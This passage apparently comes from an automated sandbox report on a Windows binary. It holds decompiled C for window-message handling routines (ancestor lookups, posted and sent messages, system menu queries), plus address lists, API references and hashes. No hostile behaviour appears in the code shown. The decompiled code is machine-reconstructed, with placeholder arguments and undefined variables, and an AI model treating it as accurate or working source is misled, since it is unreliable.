							if(_t94 <= 0x11) {
								__eflags = r14d;
								if(r14d == 0) {
									GetAncestor();
									_t261 = _t202;
								}
								__eflags = _t138 - 0xa1;
								if(__eflags == 0) {
									L79:
									_t104 = GetWindowThreadProcessId();
									r9d =  *(_t267 + 0x67) & 0x0000ffff;
									_t273 = _t261;
									 *(_t270 + 0x20) = 1;
									E00C78CFC(_t104, __eflags, _t202, _t204, _t264, _t267, _t261);
								}
								goto L71;
							}
							__eflags = _t94 - 0x14;
							if(_t94 == 0x14) {
								__eflags = _t138 - 0xa2;
								if(_t138 != 0xa2) {
									L84:
									__eflags = _t138 - 0xa5;
									if(_t138 != 0xa5) {
										goto L71;
									}
									L85:
									__eflags = r14d;
									if(r14d != 0) {
										goto L68;
									}
									L67:
									GetAncestor();
									_t261 = _t202;
									goto L68;
								}
								_t139 = 0xf060;
								L82:
								__eflags = r14d;
								if(r14d == 0) {
									GetAncestor();
									_t261 = _t202;
								}
								goto L58;
							}
							__eflags = _t94 - 0x15;
							if(_t94 != 0x15) {
								goto L45;
							}
							__eflags = _t138 - 0xa2;
							if(_t138 != 0xa2) {
								__eflags = _t138 - 0xa5;
								if(_t138 == 0xa5) {
									goto L85;
								}
								__eflags = _t138 - 0xa1;
								if(_t138 != 0xa1) {
									goto L71;
								}
								__eflags = r14d;
								if(r14d != 0) {
									goto L45;
								}
								L98:
								GetAncestor();
								_t261 = _t202;
								goto L45;
							}
							_t139 = 0xf180;
							goto L82;
						}
						if(__eflags == 0) {
							__eflags = _t138 - 0xa2;
							if(_t138 != 0xa2) {
								goto L84;
							}
							_t139 = 0xf020;
							goto L82;
						}
						__eflags = _t94 - 2;
						if(_t94 == 2) {
							L61:
							__eflags = _t138 - 0xa3;
							if(_t138 != 0xa3) {
								__eflags = _t138 - 0xa5;
								if(_t138 != 0xa5) {
									__eflags = _t138 - 0xa1;
									if(_t138 != 0xa1) {
										goto L71;
									}
									__eflags = r14d;
									if(__eflags == 0) {
										GetAncestor();
										_t261 = _t202;
									}
									goto L79;
								}
								__eflags = r14d;
								if(r14d != 0) {
									goto L68;
								}
								goto L67;
							}
							__eflags = r14d;
							if(r14d != 0) {
								goto L45;
							}
							goto L98;
						}
						__eflags = _t94 - 3;
						if(_t94 == 3) {
							__eflags = _t138 - 0xa3;
							if(_t138 != 0xa3) {
								__eflags = _t138 - 0xa5;
								if(_t138 != 0xa5) {
									goto L71;
								}
								_t139 = 0xffff;
								goto L56;
							}
							GetSystemMenu();
							__eflags = _t202;
							if(_t202 == 0) {
								goto L71;
							}
							_t67 = _t250 + 2; // 0x2
							r8d = _t67;
							_t113 = GetMenuDefaultItem(??, ??, ??);
							_t280 = _t267 - 0x79;
							 *((intOrPtr*)(_t267 - 0x79)) = 0x50;
							_t139 = _t113;
							r8d = 0;
							 *(_t267 - 0x75) = 1;
							_t115 = GetMenuItemInfoA(??, ??, ??, ??);
							r12d = 0;
							_t149 = 0xffff;
							__eflags = _t115;
							if(_t115 != 0) {
								__eflags =  *(_t267 - 0x6d) & 0x00000003;
								if(( *(_t267 - 0x6d) & 0x00000003) != 0) {
									_t139 = r12w & 0xffffffff;
								}
							}
							goto L56;
						}
						__eflags = _t94 - 5;
						if(_t94 == 5) {
							__eflags = _t138 - 0xa1;
							if(_t138 != 0xa1) {
								__eflags = _t138 - 0xa0;
								if(_t138 != 0xa0) {
									goto L61;
								}
								_t273 = _t214;
								L48:
								_t202 =  *((intOrPtr*)(_t264 + 0x38));
								r9d = 0;
								goto L70;
							}
							r8d = 1;
							goto L48;
						}
						_t63 = _t214 - 1; // 0x1
						r14d = _t63;
						__eflags = _t94 + 0xfffffffa - r14d;
						if(_t94 + 0xfffffffa > r14d) {
							goto L45;
						}
						__eflags = _t138 - 0xa5;
						if(_t138 == 0xa5) {
							goto L68;
						}
						__eflags = _t138 - 0xa1;
						if(_t138 == 0xa1) {
							_t117 = GetWindowThreadProcessId();
							 *(_t270 + 0x20) = r14d;
							__eflags = 0;
							r9d = 0;
							E00C78CFC(_t117, 0, _t202, _t204, _t264, _t267, _t261);
						}
						goto L45;
					}
					r8d = 0;
					_t120 = E00C81978(_t143, 0, _t202, _t214, _t249);
					r8d =  *(_t267 + 0x6f);
					E00C78DE0(_t204, _t264, _t261, _t264, _t267,  *((intOrPtr*)(_t267 + 0x87)));
					r8d = _t120 & 0x0000ffff;
					PostMessageA(??, ??, ??, ??);
					goto L74;
				}
				asm("bt ecx, eax");
				if(_t181 >= 0) {
					goto L33;
				} else {
					_t202 =  *((intOrPtr*)(_t264 + 0x38));
					 *(_t270 + 0x40) = _t204;
					 *(_t202 + 0x168) = 0;
					if(_t261 ==  *((intOrPtr*)(_t264 + 0x138)) || _t261 ==  *((intOrPtr*)(_t264 + 0x148)) || _t261 ==  *((intOrPtr*)(_t264 + 0x140))) {
						_t202 =  *((intOrPtr*)(_t264 + 0x38));
						_t277 =  *((intOrPtr*)(_t267 + 0x7f));
						r8d = 9;
						 *(_t270 + 0x30) = _t270 + 0x48;
						 *((intOrPtr*)(_t270 + 0x28)) = 0x3e8;
						 *(_t270 + 0x20) = 2;
						_t88 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
						if(_t202 != 0) {
							_t202 =  *((intOrPtr*)(_t264 + 0x38));
							r8d = 1;
							 *(_t202 + 0x168) = r8d;
						}
					}
					if(E00C7BFC8(_t88, _t204, _t295, _t261) == 0) {
						_t255 =  *(_t267 + 0x47);
						_t124 = E00C7BFC8(_t123, _t204, _t295, _t255);
						_t143 = 0;
						__eflags = _t124;
						_t256 =  !=  ?  *(_t267 + 0x47) : _t255;
					} else {
						_t256 = _t261;
					}
					_t237 = _t295;
					E00C7B7B0(_t204, _t237, _t256, _t261, _t264, _t267, _t272, _t277);
					_t126 =  *(_t267 + 0x6f);
					if(_t126 != 0x201) {
						__eflags = _t126 - 0x204;
						_t143 = 0xb;
						_t272 =  ==  ? _t237 : _t204;
					} else {
						r8d = 0xa;
					}
					if(_t261 ==  *((intOrPtr*)(_t264 + 0x100)) && _t272 != 0) {
						_t202 =  *((intOrPtr*)(_t264 + 0x38));
						_t277 =  *((intOrPtr*)(_t267 + 0x7f));
						PostMessageA(??, ??, ??, ??);
					}
					_t206 =  *((intOrPtr*)(_t264 + 0x248));
					if(E00C6ADD8() <= 5 || _t206 !=  *((intOrPtr*)(_t264 + 0xe8)) && _t206 !=  *((intOrPtr*)(_t264 + 0xc8))) {
						E00C7F480(_t206, _t264);
						_t204 = _t202;
					}
					if(_t285 == _t204 || (E00C7BB64(_t202, _t204, _t295, _t285, _t277) & 0x00000010) != 0) {
						L32:
						_t137 =  *(_t267 + 0x6f);
						goto L33;
					} else {
						if(_t288 != 0) {
							_t261 = _t288;
							GetAncestor(??, ??);
							_t285 = _t202;
						}
						GetWindow();
						if(_t285 != _t202) {
							L29:
							E00C7C170(_t198, _t202, _t204, _t264, _t285, _t264, _t267, _t272, _t277);
							_t137 =  *(_t267 + 0x6f);
							_t289 =  *(_t267 + 0x47);
							r9d = _t137 & 0x0000ffff;
							_t277 = _t277 << 0x00000010 | _t202;
							_t202 = _t270 + 0x40;
							 *(_t270 + 0x30) = _t202;
							 *((intOrPtr*)(_t270 + 0x28)) = 0x64;
							 *(_t270 + 0x20) = 2;
							_t97 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
							if(_t202 == 0) {
								goto L34;
							}
							_t202 =  *(_t270 + 0x40) + 0xfffffffe;
							if((_t202 & 0xfffffffd) == 0) {
								goto L75;
							}
							goto L34;
						} else {
							 *((intOrPtr*)(_t267 - 0x79)) = 0x3c;
							if(GetWindowInfo(??, ??) == 0) {
								goto L29;
							}
							_t198 =  *(_t267 - 0x51) & 0x00000080;
							if(( *(_t267 - 0x51) & 0x00000080) != 0) {
								goto L32;
							}
							goto L29;
						}
					}
				}
			}

0x00c809d4
0x00c809d4
0x00c809d4
0x00c809d4
0x00c809d4
0x00c809d9
0x00c809e9
0x00c809ee
0x00c809f5
0x00c809f8
0x00c80a03
0x00c80a06
0x00c80a0c
0x00c80a13
0x00c80a1d
0x00c80a27
0x00c80a2a
0x00c80a2d
0x00c80a32
0x00c80a32
0x00c80a37
0x00c80a39
0x00c80a3d
0x00c80a3d
0x00c80a40
0x00c80a43
0x00c80a48
0x00c80a4e
0x00c80a51
0x00c80c53
0x00c80c53
0x00c80c57
0x00c80c5d
0x00c80c62
0x00c80c68
0x00c80c6f
0x00c80c75
0x00c80c7a
0x00c80c7d
0x00c80c90
0x00c80c9b
0x00c80ca2
0x00c80cde
0x00c80ce5
0x00c80ce8
0x00c80cec
0x00c80cf4
0x00c80cf6
0x00c80cfb
0x00c80cff
0x00c80d02
0x00c80f4f
0x00c80f52
0x00c80fee
0x00c80ff4
0x00c81036
0x00c8103c
0x00c80e78
0x00c80e80
0x00c80e83
0x00c80e8a
0x00c80e8d
0x00c80e95
0x00c80e95
0x00c80e8d
0x00c80e9a
0x00c80ea0
0x00c80ea5
0x00c80ebf
0x00c80ebf
0x00c81042
0x00c81045
0x00c81048
0x00c80e64
0x00c80e64
0x00c80e6c
0x00c80e6c
0x00c80e6f
0x00c80e72
0x00000000
0x00c80e72
0x00c8101b
0x00c81023
0x00c81029
0x00c8102c
0x00c80e0f
0x00c80e0f
0x00c80e12
0x00000000
0x00000000
0x00c80e14
0x00c80e17
0x00000000
0x00000000
0x00c80e19
0x00c80e19
0x00000000
0x00c80e1d
0x00c80ff6
0x00c81004
0x00c8100c
0x00c81012
0x00c81015
0x00000000
0x00000000
0x00000000
0x00c81015
0x00c80f58
0x00c80d6c
0x00c80d6c
0x00000000
0x00c80d6f
0x00c80f5e
0x00c80f61
0x00c80fc8
0x00c80fcb
0x00c80fd4
0x00c80fda
0x00c80fda
0x00c80fdd
0x00c80fe3
0x00c80edb
0x00c80ee0
0x00c80ee6
0x00c80eeb
0x00c80ef8
0x00c80efc
0x00c80efc
0x00000000
0x00c80fe3
0x00c80f63
0x00c80f66
0x00c80fb2
0x00c80fb8
0x00c80f31
0x00c80f31
0x00c80f37
0x00000000
0x00000000
0x00c80f3d
0x00c80f3d
0x00c80f40
0x00000000
0x00000000
0x00c80e58
0x00c80e5b
0x00c80e61
0x00000000
0x00c80e61
0x00c80fbe
0x00c80f13
0x00c80f13
0x00c80f16
0x00c80f23
0x00c80f29
0x00c80f29
0x00000000
0x00c80f16
0x00c80f68
0x00c80f6b
0x00000000
0x00000000
0x00c80f71
0x00c80f77
0x00c80f80
0x00c80f86
0x00000000
0x00000000
0x00c80f88
0x00c80f8e
0x00000000
0x00000000
0x00c80f94
0x00c80f97
0x00000000
0x00000000
0x00c80fa1
0x00c80fa4
0x00c80faa
0x00000000
0x00c80faa
0x00c80f79
0x00000000
0x00c80f79
0x00c80d08
0x00c80f06
0x00c80f0c
0x00000000
0x00000000
0x00c80f0e
0x00000000
0x00c80f0e
0x00c80d13
0x00c80d15
0x00c80e31
0x00c80e31
0x00c80e37
0x00c80e49
0x00c80e4f
0x00c80ec0
0x00c80ec6
0x00000000
0x00000000
0x00c80ec8
0x00c80ecb
0x00c80ed2
0x00c80ed8
0x00c80ed8
0x00000000
0x00c80ecb
0x00c80e51
0x00c80e54
0x00000000
0x00000000
0x00000000
0x00c80e56
0x00c80e39
0x00c80e3c
0x00000000
0x00000000
0x00000000
0x00c80e42
0x00c80d1b
0x00c80d1e
0x00c80da7
0x00c80dad
0x00c80e24
0x00c80e2a
0x00000000
0x00000000
0x00c80e2c
0x00000000
0x00c80e2c
0x00c80db4
0x00c80dbd
0x00c80dc0
0x00000000
0x00000000
0x00c80dcb
0x00c80dcb
0x00c80dcf
0x00c80dd5
0x00c80dd9
0x00c80de0
0x00c80de2
0x00c80df0
0x00c80df3
0x00c80df9
0x00c80dfc
0x00c80e01
0x00c80e03
0x00c80e05
0x00c80e09
0x00c80e0b
0x00c80e0b
0x00c80e09
0x00000000
0x00c80e03
0x00c80d24
0x00c80d27
0x00c80d76
0x00c80d7c
0x00c80d96
0x00c80d9c
0x00000000
0x00000000
0x00c80da2
0x00c80d84
0x00c80d84
0x00c80d88
0x00000000
0x00c80d8b
0x00c80d7e
0x00000000
0x00c80d7e
0x00c80d2c
0x00c80d2c
0x00c80d30
0x00c80d33
0x00000000
0x00000000
0x00c80d35
0x00c80d3b
0x00000000
0x00000000
0x00c80d41
0x00c80d47
0x00c80d4e
0x00c80d57
0x00c80d61
0x00c80d63
0x00c80d67
0x00c80d67
0x00000000
0x00c80d47
0x00c80ca4
0x00c80ca9
0x00c80cb8
0x00c80cc2
0x00c80ccd
0x00c80cd3
0x00000000
0x00c80cd3
0x00c80a57
0x00c80a5a
0x00000000
0x00c80a60
0x00c80a60
0x00c80a66
0x00c80a6b
0x00c80a78
0x00c80a8c
0x00c80a95
0x00c80a99
0x00c80a9f
0x00c80aa7
0x00c80ab5
0x00c80abd
0x00c80ac6
0x00c80ac8
0x00c80acc
0x00c80ad2
0x00c80ad2
0x00c80ac6
0x00c80ae6
0x00c80aed
0x00c80af4
0x00c80af9
0x00c80afb
0x00c80aff
0x00c80ae8
0x00c80ae8
0x00c80ae8
0x00c80b04
0x00c80b07
0x00c80b0c
0x00c80b14
0x00c80b1e
0x00c80b26
0x00c80b2b
0x00c80b16
0x00c80b16
0x00c80b16
0x00c80b39
0x00c80b40
0x00c80b44
0x00c80b4e
0x00c80b4e
0x00c80b54
0x00c80b63
0x00c80b7a
0x00c80b7f
0x00c80b7f
0x00c80b85
0x00c80c50
0x00c80c50
0x00000000
0x00c80b9e
0x00c80ba1
0x00c80bab
0x00c80bae
0x00c80bb4
0x00c80bb4
0x00c80bbf
0x00c80bc8
0x00c80be8
0x00c80bee
0x00c80bfc
0x00c80c02
0x00c80c06
0x00c80c11
0x00c80c14
0x00c80c19
0x00c80c1e
0x00c80c26
0x00c80c2e
0x00c80c37
0x00000000
0x00000000
0x00c80c3e
0x00c80c48
0x00000000
0x00000000
0x00000000
0x00c80bca
0x00c80bce
0x00c80be0
0x00000000
0x00000000
0x00c80be2
0x00c80be6
0x00000000
0x00000000
0x00000000
0x00c80be6
0x00c80bc8
0x00c80b85

APIs

GetAncestor.USER32 ref: 00C80A06

Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F

Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BF74
Part of subcall function 00C7BF60: GetClassNameA.USER32 ref: 00C7BF88
Part of subcall function 00C7BF60: lstrcmpiA.KERNEL32 ref: 00C7BF9A
Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BFA7

SendMessageTimeoutA.USER32 ref: 00C80ABD
PostMessageA.USER32 ref: 00C80B4E
GetAncestor.USER32 ref: 00C80BAE
GetWindow.USER32 ref: 00C80BBF
GetWindowInfo.USER32 ref: 00C80BD8

Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFE0
Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFF2

SendMessageTimeoutA.USER32 ref: 00C80C2E
GetClassNameA.USER32 ref: 00C80C6F
PostMessageA.USER32 ref: 00C80C90
PostMessageA.USER32 ref: 00C80CD3
GetWindowThreadProcessId.USER32 ref: 00C80D4E

Part of subcall function 00C78CFC: PostMessageA.USER32 ref: 00C78D9B

GetSystemMenu.USER32 ref: 00C80DB4
GetMenuDefaultItem.USER32 ref: 00C80DCF
GetMenuItemInfoA.USER32 ref: 00C80DF3
GetAncestor.USER32 ref: 00C80E5B
PostMessageA.USER32 ref: 00C80E72
GetAncestor.USER32 ref: 00C80ED2
GetWindowThreadProcessId.USER32 ref: 00C80EE0
GetAncestor.USER32 ref: 00C80F23
GetAncestor.USER32 ref: 00C80FA4
GetAncestor.USER32 ref: 00C80FD4

Part of subcall function 00C78DE0: GetTickCount.KERNEL32 ref: 00C78E70
Part of subcall function 00C78DE0: GetClassLongPtrA.USER32 ref: 00C78EC0

GetAncestor.USER32 ref: 00C81023

Strings

d, xrefs: 00C80C1E

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Ancestor$Message$Post$Long$ClassInfoMenu$ItemNameParentProcessSendThreadTimeout$ActiveCountDefaultLastPopupSystemTicklstrcmpi
String ID: d
API String ID: 1640956133-2564639436
Opcode ID: 4e5675ef67dbeac10279ccebe900f7c3db1b69a0ab720fb5d7527fa625c51dbf
Instruction ID: 7e920b3072e74291e276bce137d6dc37fb08b91ebe010460099f131b8a9cd516
Opcode Fuzzy Hash: 4e5675ef67dbeac10279ccebe900f7c3db1b69a0ab720fb5d7527fa625c51dbf
Instruction Fuzzy Hash: EFE1353230074086EBB4AF62D9807BE6351FB45BDCF708525EEAA47B95DF38D9498309

Uniqueness

Uniqueness Score: -1.00%

Function 00C78F34, Relevance: 38.9, APIs: 20, Strings: 2, Instructions: 417
windowtimethreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00C78F34(void* __esi, signed long long __rax, long long __rbx, void* __rcx, signed long long __rdx, signed long long __r8, signed long long __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t80;
				long _t82;
				long _t88;
				int _t94;
				long _t97;
				signed short _t100;
				signed int _t103;
				void* _t119;
				signed short _t120;
				signed int _t122;
				signed int _t157;
				signed int _t158;
				void* _t159;
				void* _t161;
				signed long long _t186;
				signed long long _t190;
				signed long long _t192;
				void* _t198;
				signed long long _t234;
				signed long long _t237;
				void* _t240;
				void* _t243;
				void* _t245;
				void* _t246;
				signed long long _t248;
				signed long long _t256;
				void* _t265;
				void* _t267;
				void* _t269;
				signed long long _t270;
				struct HWND__* _t273;

				_t256 = __r9;
				_t248 = __r8;
				_t186 = __rax;
				 *((long long*)(_t245 + 0x10)) = __rbx;
				 *((long long*)(_t245 + 0x20)) = __r9;
				_push(_t243);
				_push(_t265);
				_push(_t267);
				_t246 = _t245 - 0xb0;
				_t237 = __rdx;
				_t240 = __rcx;
				_t270 = __r8;
				GetAncestor(_t273);
				_t274 = __rcx + 0x88;
				 *(_t246 + 0xf0) = __rax;
				_t230 = __rax;
				_t190 = __rax;
				E00C7BA38(_t159, __rax, __rax, __rcx + 0x88, __rax, __rcx, __r8, __r9, _t269);
				r12d = 0;
				 *(_t246 + 0x40) = _t186;
				_t157 = r12d;
				_t80 = E00C7BF60(_t186, __rdx);
				_t6 = _t265 + 1; // 0x1
				_t122 = _t6;
				if(_t80 != 0) {
					_t190 = _t237;
					_t157 = _t122;
					 *(_t246 + 0xf0) = _t190;
				}
				r13d =  *(_t246 + 0x118);
				r12d =  *(_t246 + 0x110) & 0x0000ffff;
				_t81 = _t267 - 0x201;
				_t161 = _t267 - 0x201 - 6;
				if(_t161 > 0) {
					L36:
					_t82 = 0;
					if( *(_t246 + 0x40) != _t186) {
						L74:
						return _t82;
					}
					r9d = r13w & 0xffffffff;
					r15d = r12w & 0xffffffff;
					PostMessageA(??, ??, ??, ??);
					_t198 = _t240;
					if(r12w != 1) {
						r8d =  *(_t246 + 0x120);
						_t119 = E00C78DE0(_t190, _t198, _t237, _t240, _t243,  *((intOrPtr*)(_t246 + 0x130)));
						_t123 = 0xffff;
						_t82 = r12w & 0xffffffff;
						__eflags = _t82 - 8;
						if(__eflags > 0) {
							__eflags = _t82 - 9;
							if(__eflags == 0) {
								__eflags = _t119 - 0xa2;
								if(_t119 != 0xa2) {
									__eflags = _t119 - 0xa5;
									if(_t119 != 0xa5) {
										goto L74;
									}
									_t120 = 0xffff;
									__eflags = _t157;
									if(_t157 != 0) {
										L71:
										L72:
										L73:
										_t82 = PostMessageA();
										goto L74;
									}
									L106:
									_t82 = GetAncestor();
									_t237 = _t186;
									L107:
									_t123 = 0xffff;
									L59:
									__eflags = _t120;
									if(_t120 == 0) {
										goto L74;
									}
									__eflags = _t120 - _t123;
									if(_t120 == _t123) {
										goto L71;
									}
									L61:
									r8d = _t120 & 0x0000ffff;
									goto L72;
								}
								_t186 =  *((intOrPtr*)(_t246 + 0x108));
								_t82 =  ~( *(_t186 + 0x24) & 0x01000000);
								asm("sbb cx, cx");
								_t77 = _t198 + 0xf030; // 0x1f02f
								_t120 = _t77;
								__eflags = _t157;
								if(_t157 != 0) {
									goto L107;
								}
								goto L106;
							}
							if(__eflags <= 0) {
								L48:
								goto L72;
							}
							__eflags = _t82 - 0x11;
							if(_t82 <= 0x11) {
								__eflags = _t157;
								if(_t157 == 0) {
									_t82 = GetAncestor();
									_t237 = _t186;
								}
								__eflags = _t119 - 0xa1;
								if(__eflags == 0) {
									L78:
									_t88 = GetWindowThreadProcessId();
									r9d = r12w & 0xffffffff;
									 *(_t246 + 0x20) = 1;
									_t82 = E00C78CFC(_t88, __eflags, _t186, _t190, _t240, _t243, _t237);
								}
								goto L74;
							}
							__eflags = _t82 - 0x14;
							if(_t82 == 0x14) {
								__eflags = _t119 - 0xa2;
								if(_t119 != 0xa2) {
									L83:
									__eflags = _t119 - 0xa5;
									if(_t119 != 0xa5) {
										goto L74;
									}
									L84:
									__eflags = _t157;
									if(_t157 != 0) {
										goto L71;
									}
									L70:
									GetAncestor();
									_t237 = _t186;
									goto L71;
								}
								_t120 = 0xf060;
								L81:
								__eflags = _t157;
								if(_t157 == 0) {
									GetAncestor();
									_t237 = _t186;
								}
								goto L61;
							}
							__eflags = _t82 - 0x15;
							if(_t82 != 0x15) {
								goto L48;
							}
							__eflags = _t119 - 0xa2;
							if(_t119 != 0xa2) {
								__eflags = _t119 - 0xa5;
								if(_t119 == 0xa5) {
									goto L84;
								}
								__eflags = _t119 - 0xa1;
								if(_t119 != 0xa1) {
									goto L74;
								}
								__eflags = _t157;
								if(_t157 != 0) {
									goto L48;
								}
								L97:
								GetAncestor();
								_t237 = _t186;
								goto L48;
							}
							_t120 = 0xf180;
							goto L81;
						}
						if(__eflags == 0) {
							__eflags = _t119 - 0xa2;
							if(_t119 != 0xa2) {
								goto L83;
							}
							_t120 = 0xf020;
							goto L81;
						}
						r13d = 2;
						__eflags = _t82 - r13d;
						if(_t82 == r13d) {
							L64:
							__eflags = _t119 - 0xa3;
							if(_t119 != 0xa3) {
								__eflags = _t119 - 0xa5;
								if(_t119 != 0xa5) {
									__eflags = _t119 - 0xa1;
									if(_t119 != 0xa1) {
										goto L74;
									}
									__eflags = _t157;
									if(__eflags == 0) {
										GetAncestor();
										_t237 = _t186;
									}
									goto L78;
								}
								__eflags = _t157;
								if(_t157 != 0) {
									goto L71;
								}
								goto L70;
							}
							__eflags = _t157;
							if(_t157 != 0) {
								goto L48;
							}
							goto L97;
						}
						__eflags = _t82 - 3;
						if(_t82 == 3) {
							__eflags = _t119 - 0xa3;
							if(_t119 != 0xa3) {
								__eflags = _t119 - 0xa5;
								if(_t119 != 0xa5) {
									goto L74;
								}
								_t120 = 0xffff;
								goto L59;
							}
							_t82 = GetSystemMenu();
							__eflags = _t186;
							if(_t186 == 0) {
								goto L74;
							}
							r8d = r13d;
							_t94 = GetMenuDefaultItem(??, ??, ??);
							 *((intOrPtr*)(_t246 + 0x60)) = 0x50;
							_t120 = _t94;
							r8d = 0;
							 *(_t246 + 0x64) = 1;
							_t82 = GetMenuItemInfoA(??, ??, ??, ??);
							_t123 = 0xffff;
							__eflags = _t82;
							if(_t82 != 0) {
								__eflags =  *(_t246 + 0x6c) & 0x00000003;
								if(( *(_t246 + 0x6c) & 0x00000003) != 0) {
									_t120 = 0;
								}
							}
							goto L59;
						}
						__eflags = _t82 - 5;
						if(_t82 == 5) {
							__eflags = _t119 - 0xa1;
							if(_t119 != 0xa1) {
								__eflags = _t119 - 0xa0;
								if(_t119 != 0xa0) {
									goto L64;
								}
								L51:
								r9d = 0;
								goto L73;
							}
							r8d = 1;
							goto L51;
						}
						_t158 = _t267 - 1;
						__eflags = _t82 + 0xfffffffa - _t158;
						if(_t82 + 0xfffffffa > _t158) {
							goto L48;
						}
						__eflags = _t119 - 0xa5;
						if(_t119 == 0xa5) {
							goto L71;
						}
						__eflags = _t119 - 0xa1;
						if(_t119 == 0xa1) {
							_t97 = GetWindowThreadProcessId();
							 *(_t246 + 0x20) = _t158;
							__eflags = 0;
							r9d = 0;
							E00C78CFC(_t97, 0, _t186, _t190, _t240, _t243, _t237);
						}
						goto L48;
					}
					r8d = 0;
					_t100 = E00C81978(_t122, 0, _t186, _t198, _t230);
					r8d = r13d;
					E00C78DE0(_t190, _t240, _t237, _t240, _t243,  *((intOrPtr*)(_t246 + 0x130)));
					r8d = _t100 & 0x0000ffff;
					goto L73;
				}
				_t122 = 0x49;
				asm("bt ecx, eax");
				if(_t161 >= 0) {
					goto L36;
				} else {
					_t186 =  *((intOrPtr*)(_t240 + 0x38));
					_t122 = 0;
					 *(_t186 + 0x168) = 0;
					if(_t237 ==  *((intOrPtr*)(_t240 + 0x138)) || _t237 ==  *((intOrPtr*)(_t240 + 0x148)) || _t237 ==  *((intOrPtr*)(_t240 + 0x140))) {
						_t186 =  *((intOrPtr*)(_t240 + 0x38));
						_t256 =  *((intOrPtr*)(_t246 + 0x128));
						r8d = 9;
						 *(_t246 + 0x30) = _t246 + 0x50;
						 *((intOrPtr*)(_t246 + 0x28)) = 0x3e8;
						 *(_t246 + 0x20) = 2;
						_t81 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
						if(_t186 != 0) {
							_t186 =  *((intOrPtr*)(_t240 + 0x38));
							r8d = 1;
							 *(_t186 + 0x168) = r8d;
						}
					}
					if(E00C7BFC8(_t81, _t190, _t274, _t237) == 0) {
						_t234 = _t190;
						_t103 = E00C7BFC8(_t102, _t190, _t274, _t234);
						_t122 = 0;
						__eflags = _t103;
						_t230 =  !=  ? _t190 : _t234;
					} else {
						_t230 = _t237;
					}
					E00C7B7B0(_t190, _t274, _t230, _t237, _t240, _t243, _t248, _t256);
					if(E00C6ADD8() > 5) {
						_t168 = _t237 -  *((intOrPtr*)(_t240 + 0xe8));
						if(_t237 ==  *((intOrPtr*)(_t240 + 0xe8))) {
							E00C7C170(_t168, _t186, _t190, _t240, _t237, _t240, _t243, _t248, _t256);
							_t237 =  *((intOrPtr*)(_t240 + 0xc8));
							_t270 =  *((intOrPtr*)(_t240 + 0xe8));
							_t230 = _t237;
							E00C7C170(_t168, _t186, _t190, _t240, _t230, _t240, _t243, _t248, _t256);
						}
					}
					if(r13d != 0x201) {
						__eflags = r13d - 0x204;
						r8d = 0;
						_t28 = _t230 + 0xb; // 0xb
						r8d =  ==  ? _t28 : r8d;
					} else {
						r8d = 0xa;
					}
					if(_t237 ==  *((intOrPtr*)(_t240 + 0x100)) && _t248 != 0) {
						_t186 =  *((intOrPtr*)(_t240 + 0x38));
						_t256 =  *((intOrPtr*)(_t246 + 0x128));
						PostMessageA(??, ??, ??, ??);
					}
					_t192 =  *(_t240 + 0x248);
					if(E00C6ADD8() <= 5 || _t192 !=  *((intOrPtr*)(_t240 + 0xe8)) && _t192 !=  *((intOrPtr*)(_t240 + 0xc8))) {
						E00C7F480(_t192, _t240);
						_t190 = _t186;
					}
					if(_t270 == _t190) {
						goto L36;
					} else {
						_t230 = _t270;
						if((E00C7BB64(_t186, _t190, _t274, _t270, _t256) & 0x00000010) != 0) {
							goto L36;
						}
						_t186 =  *(_t246 + 0x40);
						if(_t186 != 0) {
							_t237 = _t186;
							GetAncestor(??, ??);
							_t270 = _t186;
						}
						GetWindow();
						if(_t270 != _t186) {
							L32:
							_t230 = _t270;
							E00C7C170(_t180, _t186, _t190, _t240, _t270, _t240, _t243, _t248, _t256);
							r9d = r13w & 0xffffffff;
							_t256 = _t256 << 0x00000010 | _t186;
							_t186 = _t246 + 0x48;
							 *(_t246 + 0x30) = _t186;
							 *((intOrPtr*)(_t246 + 0x28)) = 0x64;
							 *(_t246 + 0x20) = 2;
							_t82 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
							if(_t186 == 0) {
								L34:
								if(E00C6ADD8() > 5) {
									 *(_t240 + 0x248) = _t270;
								}
								goto L36;
							}
							_t186 =  *((intOrPtr*)(_t246 + 0x48)) + 0xfffffffe;
							if((_t186 & 0xfffffffd) == 0) {
								goto L74;
							}
							goto L34;
						} else {
							_t230 = _t246 + 0x60;
							 *((intOrPtr*)(_t246 + 0x60)) = 0x3c;
							if(GetWindowInfo(??, ??) == 0) {
								goto L32;
							}
							_t180 =  *(_t246 + 0x88) & 0x00000080;
							if(( *(_t246 + 0x88) & 0x00000080) != 0) {
								goto L36;
							}
							goto L32;
						}
					}
				}
			}

0x00c78f34
0x00c78f34
0x00c78f34
0x00c78f34
0x00c78f39
0x00c78f3e
0x00c78f41
0x00c78f43
0x00c78f49
0x00c78f50
0x00c78f53
0x00c78f5e
0x00c78f61
0x00c78f67
0x00c78f6e
0x00c78f76
0x00c78f7c
0x00c78f7f
0x00c78f84
0x00c78f87
0x00c78f8f
0x00c78f92
